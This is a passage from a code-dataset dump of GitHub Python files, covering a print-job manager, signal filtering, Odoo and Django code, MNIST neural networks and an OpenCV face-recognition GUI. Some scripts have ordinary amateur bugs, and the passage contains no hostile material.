job_list == []:\n print(\"\\n No jobs of this kind.\")\n return\n\n print(\"\"\"\n ID: ADDED: PR: CUSTOMER: PRODUCT: AMOUNT: SHEET: MATERIAL: COMMENT: STATUS:\"\"\")\n for i in job_list:\n print(\" ------------------------------------------------------------------------------------------------------------------------------------------------------\")\n print(\" | \", str(i.job_id).ljust(3), \" | \", i.addedDate, \" | \", str(i.priority).ljust(2), \" | \", \\\n i.customer.ljust(15)[:15], \" | \", i.product.ljust(15)[:15], \" | \", i.amount.ljust(10)[:10], \" | \", \\\n i.printing_sheet_size.ljust(5)[:5], \" | \", i.material.ljust(13)[:13], \" | \", i.comment.ljust(10)[:10], \" | \", str(i.status).ljust(16)[:16], \"| \")\n print(\" ------------------------------------------------------------------------------------------------------------------------------------------------------\\n\")\n\n def show_job_info(self, id_to_show):\n \"\"\".ljust(14)[:14]\"\"\"\n for i in self.current_job_list[1:]:\n if i.job_id == id_to_show:\n rivitetty_comment = tools.rivitetty(i.comment, len(i.status) + 13)\n print(\"\"\" \n {} \n ---------------------------{} \n _/_/_/ _/ _/ _/_/_/_/ _/_/ ID {} : {} : {} : {} \n _/ _/_/ _/ _/ _/ _/ _/ ---------------------------{} \n _/ _/ _/ _/ _/_/_/ _/ _/ Product : {} \n _/ _/ _/_/ _/ _/ _/ _/ Amount : {} \n _/_/_/ _/ _/ _/ _/_/ Material : {} \n Sheet size : {}\"\"\".format( \\\n i.customer, \"-\".ljust(len(i.status), \"-\"), \\\n i.job_id, i.priority, i.addedDate, i.status, \\\n \"-\".ljust(len(i.status), \"-\"), \\\n i.product, \\\n i.amount, \\\n i.material,\\\n i.printing_sheet_size, \\\n ))\n \n print(\"\"\" Comment : {}\"\"\".format(rivitetty_comment[0]))\n for row in rivitetty_comment[1:]:\n print(\" {}\".format(row))\n\n print( \" ---------------------------{}\".format(\"-\".ljust(len(i.status), \"-\")))\n\n def _clear_job_list(self):\n n = tools.get_valid_input(\"Are you sure you wan't to remove all jobs from current_job_list permanently. \\\nJobs removed by 'clear' are not saved to history. \", (\"y\", \"n\"))\n if n == \"y\":\n self.current_job_list[1:] = []\n if n == \"n\":\n print(\"\\n CLEAR CANCELLED\")\n\n def restore_from_history(self):\n n = input(\"\\nType the ID of the job you wan't to restore: \")\n job_found = False\n temp_hist_log = self.get_hist()\n for job in temp_hist_log[1:]:\n if job.job_id == int(n):\n job_found = True\n job.status = tools.get_valid_input(\"Input a new STATUS for restored job:\", (\"1\",\"2\"))\n temp_hist_log.remove(job)\n self.current_job_list.append(job)\n self.write_hist(temp_hist_log)\n print(\"\\n Job {} succesfully restored from history!\".format(n))\n return\n\n if not job_found:\n print(\"\\n Job id {} not found.\".format(n))\n \n def move(self, usr_input):\n \"\"\" In the interface, user can input a string starting with mu or md, depending of direction of movement.\n Next in the string must come the ID of the job, that wan'ts to be moved.\n An optional third argument is the 'n', which indicates, that the user want's to move the item by\n a number of times. (this number is asked if the 'n' is detected \"\"\"\n\n #Check if we can use that input. If we can, use it.\n if re.fullmatch(\"[m][u,d][\\d]+[n]?\", usr_input):\n\n # get direction from usr_input\n direction = usr_input[1]\n\n # get id from usr_input and if last character is n, then ask how many times user wants to move item\n id_to_move = None\n if usr_input[-1] == \"n\":\n while True:\n how_many_times = input(\"\\nMove {} by :\".format(\"UP\" if direction == \"u\" else \"DOWN\"))\n if how_many_times.isdigit():\n how_many_times = int(how_many_times)\n break\n else:\n print(\"\\n Not a number.\")\n\n id_to_move = int(usr_input[2:-1])\n else:\n id_to_move = int(usr_input[2:])\n how_many_times = 1\n\n cur_jobs = self.current_job_list\n try:\n job_to_move = tools.get_job_by_id(id_to_move, cur_jobs[1:])\n except JobNotFoundError:\n print(\"\\n Job {} not found\".format(id_to_move))\n return\n\n index_of_target_position = None\n\n # Check if user is trying to move job too far (in place of the info object or over OR over the end of the list.) \n # stop execution if this is the case\n\n if direction == \"u\":\n index_of_target_position = cur_jobs.index(job_to_move) - how_many_times\n\n if direction == \"d\":\n index_of_target_position = cur_jobs.index(job_to_move) + how_many_times\n\n if index_of_target_position < 1 or index_of_target_position > len(cur_jobs) - 1:\n print(\"\\n Cannot move {} by {}\".format(id_to_move, how_many_times))\n return\n\n index_of_old_position = self.current_job_list.index(job_to_move)\n cur_jobs.insert(index_of_target_position, cur_jobs.pop(index_of_old_position))\n \n print(\"\\n Job {} succesfully moved {} by {}\".format(id_to_move, \n \"UP\" if direction == \"u\" else \"DOWN\", how_many_times))\n\n else:\n print(\"\\n move() can't use input:\", usr_input)\n\nclass Job:\n def __init__(self, prompted_info):\n self.prompted_info = prompted_info\n self.customer = prompted_info.get(\"customer\")\n self.product = prompted_info.get(\"product\")\n self.amount = prompted_info.get(\"amount\")\n self.material = prompted_info.get(\"material\")\n self.printing_sheet_size = prompted_info.get(\"printing_sheet_size\")\n # Status in prompted_info is always 1 or 2\n self._status = prompted_info.get(\"status\")\n # Setting status to corresponding value with property (Ready../Waiting...)\n self.status = self._status\n self.comment = prompted_info.get(\"comment\")\n self.addedDate = prompted_info.get(\"addedDate\")\n self.job_id = prompted_info.get(\"job_id\")\n self.priority = prompted_info.get(\"priority\") \n\n def _set_status(self, status_nro):\n if status_nro == \"1\":\n self._status = \"Ready to Print\"\n elif status_nro == \"2\":\n n = input(\"\\nWaiting for what: \")\n self._status = \"Waiting for: \" + n\n\n def _get_status(self):\n return self._status\n\n status = property(_get_status, _set_status)\n\n# Pistetään ohjelma pyörimään\nRUNNING_LIST = JobList()\nRUNNING_LIST.get_job_list_from_file()\n\nstart(RUNNING_LIST)\n","repo_name":"ulfaQ/JobFlow","sub_path":"jobflow.py","file_name":"jobflow.py","file_ext":"py","file_size_in_byte":14049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"41838779705","text":"import math\n\n\n# OneEuroFilter 滤波器\n# 参考于 https://jaantollander.com/post/noise-filtering-using-one-euro-filter\n\ndef smoothing_factor(t_e, cutoff):\n r = 2 * math.pi * cutoff * t_e\n return r / (r + 1)\n\n\ndef exponential_smoothing(a, x, x_prev):\n return a * x + (1 - a) * x_prev\n\n\nclass OneEuroFilter:\n def __init__(self, dx0=0.0, min_cutoff=1.0, beta=0.0,\n d_cutoff=1.0):\n \"\"\"Initialize the one euro filter.\"\"\"\n self.min_cutoff = float(min_cutoff)\n self.beta = float(beta)\n self.d_cutoff = float(d_cutoff)\n self.dx_prev = float(dx0)\n\n def __call__(self, x, x_prev):\n if x_prev is None:\n return x\n t_e = 1\n a_d = smoothing_factor(t_e, self.d_cutoff)\n dx = (x - x_prev) / t_e\n dx_hat = exponential_smoothing(a_d, dx, self.dx_prev)\n cutoff = self.min_cutoff + self.beta * abs(dx_hat)\n a = smoothing_factor(t_e, cutoff)\n x_hat = exponential_smoothing(a, x, x_prev)\n self.dx_prev = dx_hat\n return x_hat\n","repo_name":"L0veSunshine/Eye_Contact","sub_path":"4.Predict/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"26205129262","text":"# _*_ coding:utf-8 _*_\n# @File : weekly_report.py\n# @Time : 2020-10-15 11:28\n# @Author: zizle\nimport json\nfrom PyQt5.QtWidgets import qApp\nfrom PyQt5.QtNetwork import QNetworkRequest\nfrom PyQt5.QtCore import QUrl\nfrom .abstract_report import ReportAbstract\nfrom settings import SERVER_API\n\n\nclass WeeklyReport(ReportAbstract):\n def __init__(self, *args, **kwargs):\n super(WeeklyReport, self).__init__(*args, **kwargs)\n self.set_page_name(\"研究周报\")\n self.date_edit.hide() # 隐藏日期\n # 获取报告\n self.get_weekly_reports()\n # 点击查询\n self.query_button.clicked.connect(self.get_weekly_reports)\n # 点击页码的事件\n self.paginator.clicked.connect(self.get_weekly_reports)\n\n def get_weekly_reports(self):\n \"\"\" 分页查询周报数据 \"\"\"\n current_page = self.paginator.get_current_page()\n current_variety = self.variety_combobox.currentData()\n url = SERVER_API + \"report-file/paginator/?report_type=weekly&variety_en={}&page={}&page_size=50\".format(current_variety, current_page)\n network_manager = getattr(qApp, \"_network\")\n reply = network_manager.get(QNetworkRequest(QUrl(url)))\n reply.finished.connect(self.current_report_reply)\n\n def current_report_reply(self):\n \"\"\" 当前报告返回 \"\"\"\n reply = self.sender()\n if reply.error():\n pass\n else:\n data = json.loads(reply.readAll().data().decode(\"utf-8\"))\n self.show_report_content(data[\"reports\"])\n reply.deleteLater()\n","repo_name":"zizle/AnalysisDecisionClient","sub_path":"frames/homepage_extend/weekly_report.py","file_name":"weekly_report.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"14963648852","text":"import os,sys \nparentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) \nsys.path.insert(0,parentdir) \n\nimport xmind\nfrom xmind.core.markerref import MarkerId\nxmind_name=\"mysql\"\nw = xmind.load(os.path.dirname(os.path.abspath(__file__))+\"\\\\\"+xmind_name+\".xmind\") \ns2=w.createSheet()\ns2.setTitle(\"order by\")\nr2=s2.getRootTopic()\nr2.setTitle(\"order by\")\n\ncontent={\n'order by':[\n {'排序使用空间(内存or磁盘)':[\n '排序所需内存',\n 'sort_buffer_size:MySQL 为排序开辟的内存(sort_buffer)的大小',\n 'max_length_for_sort_data:控制排序行数据长度,如单行长度超过此值,只写排序字段和id'\n ]},\n {'外部排序':[\n '使用归并算法',\n '将需排序数据分成n份,每份单独排序后存入临时文件',\n '最后将n份有序文件合并成一个有序的大文件'\n ]},\n {'全字段排序':[\n '流程:xx索引->表T主键索引->sort_buffer->sort_buffer排序->结果集',\n '内存大,优先选择此算法',\n '字段都放到sort_buffer中,排序后直接从内存返回,不再回表'\n ]},\n {'rowid排序':[\n '流程:xx索引->表T主键索引->sort_buffer->sort_buffer排序->表T主键索引->结果集',\n '归并算法和优先队列排序算法',\n '内存小,影响排序效率,使用此算法',\n '一次可以排序更多行,但需要回表(造成磁盘读)',\n '对于内存表,回表只是根据数据行位置得到数据(不访问磁盘),优化器优选rowid排序'\n ]},\n 'order by语句,未必都要排序,如数据是有序的,直接从索引上取数据,回表,组结果集'\n],\n'order by rand()':[\n 'MySQL对临时表排序的执行过程',\n '分析sql:select word from words order by rand() limit 3',\n {'order by rand()':[\n '使用Using temporary(内存临时表):排序时候使用rowid排序方法',\n 'tmp_table_size:限制了内存临时表大小,默认值16M',\n '如临时表超过了tmp_table_size,内存临时表就会转成磁盘临时表',\n '使用Using filesort(sort_buffer排序)'\n ]},\n {'rowid':[\n 'rowid:每个引擎用来唯一标识数据行的信息',\n '对有主键的 InnoDB 表,rowid 就是主键 ID',\n '对没有主键的 InnoDB 表,rowid 由系统生成的',\n 'MEMORY引擎不是索引组织表,可认为它是一个数组,rowid是数组的下标'\n ]}\n]\n}\n\n#构建xmind\nxmind.build(content,r2)\n#保存xmind\nxmind.save(w,os.path.dirname(os.path.abspath(__file__))+\"\\\\\"+xmind_name+\".xmind\") ","repo_name":"xiongmengmeng/xmind-technology","sub_path":"5.mysql/mysql8-order by.py","file_name":"mysql8-order by.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"33920519825","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\n\nclass ProductAttribute(models.Model):\n _name = \"product.attribute\"\n _description = \"Product Attribute\"\n # if you change this _order, keep it in sync with the method\n # `_sort_key_attribute_value` in `product.template`\n _order = 'sequence, id'\n\n _sql_constraints = [\n (\n 'check_multi_checkbox_no_variant',\n \"CHECK(display_type != 'multi' OR create_variant = 'no_variant')\",\n \"Multi-checkbox display type is not compatible with the creation of variants\"\n ),\n ]\n\n name = fields.Char(string=\"Attribute\", required=True, translate=True)\n create_variant = fields.Selection(\n selection=[\n ('always', 'Instantly'),\n ('dynamic', 'Dynamically'),\n ('no_variant', 'Never (option)'),\n ],\n default='always',\n string=\"Variants Creation Mode\",\n help=\"\"\"- Instantly: All possible variants are created as soon as the attribute and its values are added to a product.\n - Dynamically: Each variant is created only when its corresponding attributes and values are added to a sales order.\n - Never: Variants are never created for the attribute.\n Note: the variants creation mode cannot be changed once the attribute is used on at least one product.\"\"\",\n required=True)\n display_type = fields.Selection(\n selection=[\n ('radio', 'Radio'),\n ('pills', 'Pills'),\n ('select', 'Select'),\n ('color', 'Color'),\n ('multi', 'Multi-checkbox (option)'),\n ],\n default='radio',\n required=True,\n help=\"The display type used in the Product Configurator.\")\n sequence = fields.Integer(string=\"Sequence\", help=\"Determine the display order\", index=True)\n\n value_ids = fields.One2many(\n comodel_name='product.attribute.value',\n inverse_name='attribute_id',\n string=\"Values\", copy=True)\n\n attribute_line_ids = fields.One2many(\n comodel_name='product.template.attribute.line',\n inverse_name='attribute_id',\n string=\"Lines\")\n product_tmpl_ids = fields.Many2many(\n comodel_name='product.template',\n string=\"Related Products\",\n compute='_compute_products',\n store=True)\n number_related_products = fields.Integer(compute='_compute_number_related_products')\n\n @api.depends('product_tmpl_ids')\n def _compute_number_related_products(self):\n for pa in self:\n pa.number_related_products = len(pa.product_tmpl_ids)\n\n @api.depends('attribute_line_ids.active', 'attribute_line_ids.product_tmpl_id')\n def _compute_products(self):\n for pa in self:\n pa.with_context(active_test=False).product_tmpl_ids = pa.attribute_line_ids.product_tmpl_id\n\n def _without_no_variant_attributes(self):\n return self.filtered(lambda pa: pa.create_variant != 'no_variant')\n\n def write(self, vals):\n \"\"\"Override to make sure attribute type can't be changed if it's used on\n a product template.\n\n This is important to prevent because changing the type would make\n existing combinations invalid without recomputing them, and recomputing\n them might take too long and we don't want to change products without\n the user knowing about it.\"\"\"\n if 'create_variant' in vals:\n for pa in self:\n if vals['create_variant'] != pa.create_variant and pa.number_related_products:\n raise UserError(_(\n \"You cannot change the Variants Creation Mode of the attribute %(attribute)s\"\n \" because it is used on the following products:\\n%(products)s\",\n attribute=pa.display_name,\n products=\", \".join(pa.product_tmpl_ids.mapped('display_name')),\n ))\n invalidate = 'sequence' in vals and any(record.sequence != vals['sequence'] for record in self)\n res = super().write(vals)\n if invalidate:\n # prefetched o2m have to be resequenced\n # (eg. product.template: attribute_line_ids)\n self.env.flush_all()\n self.env.invalidate_all()\n return res\n\n @api.ondelete(at_uninstall=False)\n def _unlink_except_used_on_product(self):\n for pa in self:\n if pa.number_related_products:\n raise UserError(_(\n \"You cannot delete the attribute %(attribute)s because it is used on the\"\n \" following products:\\n%(products)s\",\n attribute=pa.display_name,\n products=\", \".join(pa.product_tmpl_ids.mapped('display_name')),\n ))\n\n def action_open_related_products(self):\n return {\n 'type': 'ir.actions.act_window',\n 'name': _(\"Related Products\"),\n 'res_model': 'product.template',\n 'view_mode': 'tree,form',\n 'domain': [('id', 'in', self.product_tmpl_ids.ids)],\n }\n","repo_name":"odoo/odoo","sub_path":"addons/product/models/product_attribute.py","file_name":"product_attribute.py","file_ext":"py","file_size_in_byte":5093,"program_lang":"python","lang":"en","doc_type":"code","stars":31745,"dataset":"github-code","pt":"71"}
+{"seq_id":"21080598472","text":"from collections import Counter\nfrom union_find import Component\n\ndef components(grid):\n rs = grid.split('\\n')\n cols = rs[0].count('+') - 1\n rows = len(rs) // 2\n comps = {(r, c):Component() for r in range(rows) for c in range(cols)}\n\n def noWallOnRight(r, c):\n return rs[2 * r + 1][3 * c + 3] == ' '\n\n def noWallBelow(r, c):\n return rs[2 * (r + 1)][3 * c + 1: 3 * c + 3] == ' '\n\n for r in range(rows):\n for c in range(cols):\n if noWallOnRight(r, c): comps[(r, c)].union(comps[(r, c + 1)])\n if noWallBelow(r, c): comps[(r, c)].union(comps[(r + 1, c)])\n\n for r in range(rows):\n for c in range(cols):\n comps[(r, c)] = comps[(r, c)].find()\n\n return sorted(Counter(Counter(comps.values()).values()).items(), reverse=True)\n\nfrom random import randrange\n\nclass Edge(object):\n def __init__(self, u, v):\n self.u = u\n self.v = v\n self.cost = randrange(10) + 1\n\nclass Node(object):\n def __init__(self, row, col):\n self.row = row\n self.col = col\n\ndef generate_grid(rows, cols, n):\n## assert n <= 2 * rows * cols - rows - cols\n assert n < rows * cols\n nodes = [[Node(r, c) for c in range(cols)] for r in range(rows)]\n v_edges = {Edge(nodes[r][c], nodes[r][c + 1]) for c in range(cols - 1) for r in range(rows)}\n h_edges = {Edge(nodes[r][c], nodes[r + 1][c]) for c in range(cols) for r in range(rows - 1)}\n all_edges = v_edges | h_edges\n sorted_edges = sorted(all_edges, key=lambda e: e.cost)\n comps = {node:Component() for row in nodes for node in row}\n def select_edges():\n s_edges = set()\n edge_gen = (e for e in sorted_edges)\n selected = 0\n while selected < n:\n e = next(edge_gen)\n if comps[e.u].find() != comps[e.v].find():\n comps[e.u].union(comps[e.v])\n s_edges.add((e.u.row, e.u.col, 'v' if e.u.row == e.v.row else 'h'))\n selected += 1\n return s_edges\n\n def grid(edges):\n lines = []\n lines.append('+' + '--+' * cols)\n for r in range(rows):\n lines.append('|' + ''.join(' ' if (r, c, 'v') in edges else ' |' for c in range(cols)))\n lines.append('+' + ''.join(' +' if (r, c, 'h') in edges else '--+' for c in range(cols)))\n return '\\n'.join(lines)\n \n return grid(select_edges())\n\n\n","repo_name":"ecolban/py_files","sub_path":"count_connectivity_components.py","file_name":"count_connectivity_components.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"39349825019","text":"import os\nimport time\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom selenium import webdriver\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.webdriver.common.keys import Keys\nfrom django.contrib.auth import BACKEND_SESSION_KEY, SESSION_KEY, get_user_model\nfrom django.contrib.sessions.backends.db import SessionStore\nfrom accounts.models import User\nfrom django.conf import settings\n\ndef wait(fn):\n def modified_fn(*args, **kwargs):\n MAX_WAIT = 10 \n start_time = time.time()\n while True:\n try:\n return fn(*args, **kwargs) \n except (AssertionError, WebDriverException) as e:\n if time.time() - start_time > MAX_WAIT:\n raise e\n time.sleep(0.5)\n return modified_fn\n\n\nclass FunctionalTest(StaticLiveServerTestCase):\n \n \n def setUp(self):\n self.browser = webdriver.Firefox(executable_path=\"C:\\\\Users\\\\Arnold\\\\geckodriver\\\\geckodriver.exe\")\n\n def get_item_input_box(self):\n return self.browser.find_element_by_id('text') \n\n \n\n @wait\n def wait_for(self, fn):\n return fn()\n\n @wait\n def wait_for_row_in_list_table(self, row_text):\n table = self.browser.find_element_by_id('id_list_table')\n rows = table.find_elements_by_tag_name('tr')\n self.assertIn(row_text, [row.text for row in rows])\n\n\n @wait\n def wait_to_be_logged_in(self, email):\n self.browser.find_element_by_link_text('Log out')\n navbar = self.browser.find_element_by_css_selector('.navbar')\n self.assertIn(email, navbar.text)\n\n\n @wait\n def wait_to_be_logged_out(self, email):\n self.browser.find_element_by_name('email')\n navbar = self.browser.find_element_by_css_selector('.navbar')\n self.assertNotIn(email, navbar.text)\n\n \n def create_pre_authenticated_session(self, email):\n user = User.objects.create(email=email)\n session = SessionStore()\n session[SESSION_KEY] = user.pk \n session[BACKEND_SESSION_KEY] = settings.AUTHENTICATION_BACKENDS[0]\n session.save()\n ## to set a cookie we need to first visit the domain.\n ## 404 pages load the quickest!\n self.browser.get(self.live_server_url + \"/404_no_such_url/\")\n self.browser.add_cookie(dict(\n name=settings.SESSION_COOKIE_NAME,\n value=session.session_key, \n path='/',\n )) \n\n ","repo_name":"SzocsArnold/TDDbook","sub_path":"functional_tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"13533340882","text":"import csv\nfrom flask import Flask, request\nfrom app.matrix import Matrix\napp = Flask(__name__)\n\n@app.route('/echo', methods=['GET', 'POST'])\ndef hello_world():\n if request.method == 'POST':\n f = request.files['file']\n # open file and read its contents\n data = []\n \n try:\n # read csv file\n with open(f.filename, 'r') as obj:\n # Return a reader object which will\n # iterate over lines in the given csvfile\n csv_reader = csv.reader(obj)\n \n # convert string to list\n data = list(csv_reader)\n # perform all matrix operations\n matrix = Matrix(data)\n \n # perform all matrix contents and join them as a string\n result = \"*********** Matrix to String ***********\\n\" + matrix.matrixToString() + '\\n' + \"*********** Flatten Matrix ***********\\n\" + matrix.matrixFlatten() + '\\n' + \"*********** Inverted Matrix ***********\\n\" + matrix.matrixInvert() + '\\n' + \"*********** Product of all Elements ***********\\n\" + str(matrix.matrixProduct()) + '\\n' + \"*********** Sum of all Elements ***********\\n\" + str(matrix.matrixSum()) + '\\n'\n \n return result\n except:\n return \"Invalid CSV file\"\n \n return 'Hello, please upload a csv file!'","repo_name":"matrixjnr/flask_testing","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"18892468986","text":"'''\n File name: mnist.py\n Author: Team Pi\n Date created: 04/04/2019\n Assignment: Assignment 2, Machine Learning for Data Analytics\n\n Networks for the MNIST dataset\n'''\n\n\n#Convolutional Networks\ndef cnn(combination, learning_rate, n_epochs, batches):\n import tensorflow_datasets as tfds\n import numpy as np\n from tensorflow.keras import datasets, layers, models, callbacks\n from tensorflow.keras.optimizers import RMSprop\n from tensorflow.keras.callbacks import ModelCheckpoint\n\n #import the data\n builder = tfds.builder(\"mnist\")\n assert builder.info.splits['train'].num_examples == 60000\n builder.download_and_prepare()\n datasets = builder.as_dataset()\n np_datasets = tfds.as_numpy(datasets)\n mnist = np_datasets\n\n #get the test and training datset splits\n train = list(mnist['train'])\n test = list(mnist['test'])\n X_train = [item['image'] for item in train]\n X_train = np.asarray(X_train, dtype=np.float32)\n train_images = X_train / 255.0\n\n y_train = [item['label'] for item in train]\n train_labels = np.asarray(y_train, dtype=np.int32)\n\n X_test = [item['image'] for item in test]\n X_test = np.asarray(X_test, dtype=np.float32)\n test_images = X_test / 255.0\n\n y_test = [item['label'] for item in test]\n test_labels = np.asarray(y_test, dtype=np.int32)\n\n #create the model\n model = models.Sequential()\n model.add(layers.Conv2D(32, (5, 5), activation='relu', input_shape=(28, 28, 1)))\n model.add(layers.MaxPooling2D((2, 2)))\n if (combination == 2):\n model.add(layers.Conv2D(32, (3, 3), activation='relu'))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Flatten())\n if (combination == 4):\n model.add(layers.Dropout(0.9))\n else:\n model.add(layers.Dropout(0.4))\n model.add(layers.Dense(100, activation='sigmoid'))\n model.add(layers.Dense(10, activation='softmax'))\n model.compile(optimizer=RMSprop(lr=learning_rate),\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n #model.summary()\n #create ckpt file\n if (combination == 1):\n model.save(\"mnist-1-\"+ str(learning_rate) + \"-\" +str(n_epochs) + \"-\" + str(batches) + \".ckpt\")\n tbCallBack = callbacks.TensorBoard(log_dir='/Graph', histogram_freq=0,\n write_graph=True, write_images=True)\n model.fit(train_images, train_labels, epochs=n_epochs, verbose=0, batch_size=60000 // batches,\n callbacks=[tbCallBack])\n train_loss, train_acc = model.evaluate(train_images, train_labels, verbose=0)\n test_loss, test_acc = model.evaluate(test_images, test_labels, verbose = 0)\n print(\"Training Accuracy:\",train_acc)\n print(\"Testing Accuracy:\", test_acc)\n\n\ndef mlp(combination, learning_rate, n_epochs, batches):\n from itertools import islice\n import tensorflow_datasets as tfds\n from tensorflow.contrib.layers import fully_connected\n import numpy as np\n from tensorflow.nn import sigmoid, relu, sparse_softmax_cross_entropy_with_logits, in_top_k\n from tensorflow import placeholder,float32, int64, name_scope, reduce_mean, global_variables_initializer, cast, Session\n from tensorflow.train import Saver, GradientDescentOptimizer\n\n #import the data\n builder = tfds.builder(\"mnist\")\n assert builder.info.splits['train'].num_examples == 60000\n builder.download_and_prepare()\n datasets = builder.as_dataset()\n np_datasets = tfds.as_numpy(datasets)\n mnist = np_datasets\n train = list(mnist['train'])\n test = list(mnist['test'])\n\n #define the placeholders\n\n X = placeholder(float32, shape=(None, 784), name=\"X\")\n y = placeholder(int64, shape=(None), name=\"y\")\n\n with name_scope(\"mlp\"):\n hidden1 = fully_connected(X, 100, scope=\"hidden1\", activation_fn=sigmoid)\n if combination == 2:\n hidden2 = fully_connected(hidden1, 100, scope=\"hidden2\", activation_fn=sigmoid)\n hidden3 = fully_connected(hidden2, 100, scope=\"hidden3\", activation_fn=sigmoid)\n logits = fully_connected(hidden3, 10, scope=\"outputs\", activation_fn=None)\n else:\n logits = fully_connected(hidden1, 10, scope=\"outputs\", activation_fn=None)\n\n with name_scope(\"loss\"):\n xentropy = sparse_softmax_cross_entropy_with_logits(\n labels=y, logits=logits)\n loss = reduce_mean(xentropy, name=\"loss\")\n\n with name_scope(\"eval\"):\n correct = in_top_k(logits, y, 1)\n accuracy = reduce_mean(cast(correct, float32))\n\n init = global_variables_initializer()\n saver = Saver()\n\n with name_scope(\"train\"):\n optimizer = GradientDescentOptimizer(learning_rate)\n training_op = optimizer.minimize(loss)\n\n with Session() as sess:\n init.run()\n for epoch in range(n_epochs):\n for iteration in range(batches):\n temp = list(islice(train, 60000 // batches))\n X_train = [item['image'] for item in temp]\n y_train = [item['label'] for item in temp]\n new_batch = []\n for item in X_train:\n new_batch.append(item.reshape(784))\n sess.run(training_op, feed_dict={X: new_batch, y: y_train})\n acc_train = accuracy.eval(feed_dict={X: new_batch, y: y_train})\n X_test = [item['image'] for item in test]\n y_test = [item['label'] for item in test]\n new_test = []\n for item in X_test:\n new_test.append(item.reshape(784))\n acc_test = accuracy.eval(feed_dict={X: new_test, y: y_test})\n print(\"Training accuracy:\", acc_train)\n print(\"Testing accuracy:\", acc_test)\n #save_path = saver.save(sess, \"./my_model_final.ckpt\")\n\n","repo_name":"2092971R/cs987","sub_path":"mnist_combinations.py","file_name":"mnist_combinations.py","file_ext":"py","file_size_in_byte":5774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5781280048","text":"import numpy as np\nimport cv2\nimport Tkinter as tk\nfrom Tkinter import *\nimport Image, ImageTk\nimport urllib\nimport sqlite3\nimport ttk\nimport tkMessageBox\nfrom face_recognizer import recognizeFace\nfrom dataset_creator import datasetCreate\n\n#Global variables\nfontFace = cv2.FONT_HERSHEY_SIMPLEX\nfontScale = 1\nfontColor = (255, 0, 0)\nfontColor1 = (0, 0, 255)\nsampleNum =0\n#url='http://192.168.0.109:8080/shot.jpg'\n\ndetector = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\n\nrecognizer.read('trainer/trainer.yml')\n\ncascadePath = \"haarcascade_frontalface_default.xml\"\n\nfaceCascade = cv2.CascadeClassifier(cascadePath);\n\n#Set up GUI\nroot = tk.Tk()\nroot.geometry(\"1280x800\")\n#Makes main window\nroot.wm_title(\"Floating Faces\")\nroot.config(background=\"#00394d\")\n\n#Graphics window\nimageFrame = tk.Frame(root, width=200, height=600)\nimageFrame.grid(row=0, column=0, padx=70, pady=100)\n# Button(root,text=tk.Frame = tk.LabelFrame\"Submit\").grid(row=3)\n\n#Capture video frames\nlmain = tk.Label(imageFrame)\nlmain.grid(row=0, column=0)\n\n\n# Quits the TkInter app when called\ndef quit_app():\n root.quit()\n\n\n# Opens a message box when called\ndef show_about(event=None):\n tkMessageBox.showwarning(\n \"About\",\n \"This Awesome Program was Made in 2016\"\n )\n\n\n# Create the menu object\nthe_menu = Menu(root)\n\n# ----- FILE MENU -----\n\n# Create a pull down menu that can't be removed\nfile_menu = Menu(the_menu, tearoff=0)\n\n# Add items to the menu that show when clicked\n# compound allows you to add an image\nfile_menu.add_command(label=\"Open\")\nfile_menu.add_command(label=\"Save\")\n\n# Add a horizontal bar to group similar commands\nfile_menu.add_separator()\n\n# Call for the function to execute when clicked\nfile_menu.add_command(label=\"Quit\", command=quit_app)\n\n# Add the pull down menu to the menu bar\nthe_menu.add_cascade(label=\"File\", menu=file_menu)\n\ndef insertOrUpdate(Name):\n conn = sqlite3.connect(\"Faces1.0.db\")\n with conn:\n cur=conn.cursor()\n cur.execute(\"INSERT INTO People(Name) VALUES ('\"+ Name +\"');\")\n max_id = cur.lastrowid\n Id= max_id\n cmd = \"SELECT * FROM People WHERE ID=\"+str(Id)\n cursor = conn.execute(cmd)\n isRecordExist=0\n for row in cursor:\n isRecordExist=1\n if(isRecordExist==1):\n cmd = \"UPDATE people SET Name=' \" + str(sname) + \" ' WHERE ID=\" + str(Id)\n else:\n cmd = \"INSERT INTO people(ID,Name) Values(\" + str(Id) + \",' \" + str(sname) + \" ' )\"\n conn.execute(cmd)\n conn.commit()\n conn.close()\n return max_id\n## VIDEO FEED ##\ndef createFrame():\n\n cv2image = datasetCreate()\n\n#Slider window (slider controls stage position)\n#sliderFrame = tk.Frame(root, width=1000, height=200)\n#sliderFrame.grid(row = 600, column=0, padx=10, pady=2)\n\nroot.config(menu=the_menu)\ncreateFrame() #Display loop\nroot.mainloop() #Starts GUI\n","repo_name":"oneguygirl/FFRec","sub_path":"VFR_GUI_dataset_creator.py","file_name":"VFR_GUI_dataset_creator.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
